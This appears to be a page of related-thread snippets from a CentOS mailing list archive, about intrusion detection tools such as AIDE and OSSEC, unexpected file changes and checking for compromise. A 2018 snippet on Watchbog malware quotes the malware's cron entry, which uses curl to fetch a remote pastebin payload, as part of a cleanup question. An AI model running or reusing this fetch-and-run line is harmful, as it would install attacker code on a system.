similar to: AIDE or OSSEC on CentOS 5.4 x86_64?


2010 Mar 04
8
Intrusion Detection
Hello all, I have been exploring the various intrusion detection systems available for the Linux platform and was wondering which ones you all would recommend? I have used AIDE before and while it is extremely easy to set up, it does not support the ability to send alerts as files are changed (which allows one to be aware of an intrusion almost immediately). Thank you, Dan Burkland
2017 Nov 06
1
How to detect botnet user on the server ?
Another alternative is to use a FIMS/HIDS such as Aide (Advanced Intrusion Detection Environment), OSSEC or Samhain. Be prepared to learn a lot about what your OS normally does behind the scenes (and thus a fair amount of initial fine tuning to exclude those things). Aide seems to work well (I've seen only one odd result) and is quite granular. However, it is local system based rather than
2018 Dec 15
7
CentOS 7.5 Linux box got infected with Watchbog malware
Hi, Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently I am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the steps below, which are done manually. 1) rm -fr /tmp/*timesyncc.service* 2) crontab -e -u apigee, delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget
2017 Nov 06
2
How to detect botnet user on the server ?
Hello guys, What is the best way to identify a possible user using a botnet with PHP on the server? And if he is using GET commands, for example, to another server. Does Apache log outbound connections? If it is using a file that is not malicious, ClamAV would not identify it. Thanks
2012 May 25
4
PCI/DSS compliance on CentOS
I have a client project to implement PCI/DSS compliance. The PCI/DSS auditor has stipulated that the web server, application middleware (tomcat), and the db server have to be on different systems. In addition the auditor has also stipulated that there be an NTP server and a "patch" server. The host OS on all of the above nodes will be CentOS 6.2. Below is a list of things that would be
2012 Sep 28
1
Changes to inodes discovered by aide
Hi. On one of my servers aide just reported inode changes to a large bunch of files in a variety of directories, e.g. /usr/bin, /usr/sbin etc. This machine sits behind a couple of firewalls and it would be hard to get to. The day before I updated "clam*" and updated the aide database right after that: -rw------- 1 root root 7407412 Sep 26 10:58 aide.db.gz The problem was that the
2008 Dec 28
1
aide and changes in system
I've checked my system with aide and I've received this information: changed: /bin changed: /bin/tar changed: /bin/mv changed: /bin/cp changed: /bin/ls changed: /bin/vi I don't remember that I changed those commands; what does it mean? Has somebody broken in? Or are those commands changed normally?
2014 Sep 09
1
C6 : AIDE experience
Having problems with Tripwire on C6, I installed AIDE from the base repository. x86_64 0.14-3.el6_2.2 base 123 k typing: aide result: "Couldn't open file /var/lib/aide/aide.db.gz for reading" (directory is empty and aide.db.gz does not exist.) typing: aide -i (to initialise the AIDE database) result: "AIDE, version 0.14 ### AIDE database at
2012 Aug 22
2
Hiera, OSSEC and per-node stuff?
Hi. I have an interesting use case. OSSEC is a security tool based on a server-client architecture. The server generates keys for agents, and every agent has a different key. Now I want to distribute these keys via Puppet. I've come across Hiera and installed it, and it works superbly, but how do I store a per-node key in Hiera? This is my idea: hiera.yaml: --- :hierarchy: -
2019 Nov 14
4
how to know when a system is compromised
How do you know when a Linux system has been compromised? Every day I watch our systems with all the typical tools (ps, top, who), I watch firewall / IPS logs, I have logwatch set up and mailing daily summaries to me, and I dive deeper into logs if something looks suspicious. What am I missing or not looking at that you security gurus are looking at? I subscribe to the CentOS and SANS
2016 Feb 02
2
Wiki Update - Aide Link
Hello All, My username is MikeThompson. The link to configure AIDE at the bottom of this page: https://wiki.centos.org/HowTos/OS_Protection is dead, and says it's dead; however, the old link to http://www.bofh-hunter.com/2008/04/10/centos-5-and-aide/ now redirects to a malicious website. One of my less-than-savvy users got his Windows machine infected there last night. I'm wondering if it
2008 Apr 09
1
aide questions, please
I'm trying out aide since tripwire doesn't seem to be in the 5. releases anymore. I do not have SELinux on the server (no at installation), and I just yum installed the aide rpms, so I should have the latest. When I run my aide --init, I get all of these lines for all the files: lgetfilecon_raw failed for /usr/share/X11/app-defaults/XLogo:No data available I then copy the
2005 Jun 16
3
turning off prelinking?
In short, the reason for considering (and still only considering) turning it off is to make tripwire usable again (security vs. performance, I guess). Is it possible to completely turn it off system-wide? Are any additional steps needed on the existing system (which already has half of the binaries prelinked)? What order of performance degradation is to be expected? If it is minor, nobody is going to cry
2007 Sep 26
4
Intrusion Detection Systems
Situation: We are providing hosting services. I've grown tired of the various kiddie scripts/dictionary attacks on various services. The latest has been against vsftpd, on systems that I can't easily control, vs. putting strict limits on ssh. We simply have too many users entering from too many networks, many with dynamic IP addresses. Enter... thinking about LIDS or Log Based
2010 Apr 29
1
Aide error "Caught SIGBUS/SEGV"
One of my servers has recently started giving an error every time I run "aide --check". I ran it manually twice today with the same results. The second time, I added the -V flag, but that didn't give me anything useful. The system is currently running CentOS 5.3. Nothing on the system has changed recently (that I am aware of). The Aide database hasn't been updated in a few
2015 Jan 13
1
SELinux-alert: aide wants to write to /var/run/winbindd/pipe
Hi, does anyone know if aide should have access to this socket? SELinux is preventing /usr/sbin/aide from write access on the sock_file /var/run/winbindd/pipe. Thanks Patrick (on CentOS6 if that matters)
2009 Oct 27
0
Warning message when running aide after upgrading to 5.4
I upgraded my box from 5.3 to 5.4. When running "aide --update", I'm getting this warning message in /var/log/messages: "aide: Libgcrypt warning: missing initialization - please fix the application" Below is the aide version installed: aide -v Aide 0.13.1 Compiled with the following options: WITH_MMAP WITH_POSIX_ACL WITH_SELINUX WITH_XATTR WITH_LSTAT64 WITH_READDIR64
2006 Mar 29
2
AIDE Reports changed:/boot/grub/stage2
My daily AIDE report suggests Grub's stage2 file has changed. Could I trouble you for your opinion about how concerned I should be, and what to do if your concern is moderate or higher? File: /boot/grub/stage2 MD5 : Mlkt9ZVo59SSjvodt+956Q== , yIQIMP6TUHG5BegtoOk0ug== SHA1 : ZxehaXSXcnH/WlcInHpFnyT1vcg= , dReBGlO3DIAB+mjsxUWioB8NlbE=
2010 Aug 16
4
Need tip on an inexpensive printer for college student using CentOS 5.5
Sending my son back to college with a dual-boot laptop with Win 7 and CentOS 5.5. He uses Win7 to manage his iPod and SW that is sometimes issued by a professor for a specific course... otherwise he uses CentOS for everything else. That setup worked well last year, except for printing. He has a low-end Canon printer that is not supported in the Linux realm. Most of his coursework was uploaded to
2011 Feb 02
1
The AIDE section of the Hardening CentOS wiki page
I have recently received an e-mail message regarding the above wiki page. I reproduce it below, less the header. As I was the last to edit that page, I am mentioned in the details at its foot, and that is from where the message author's error originates -- as I'm not the original creator of the page. The broken link is to a section of the blog of Jim "Evolution" Perrin. Are you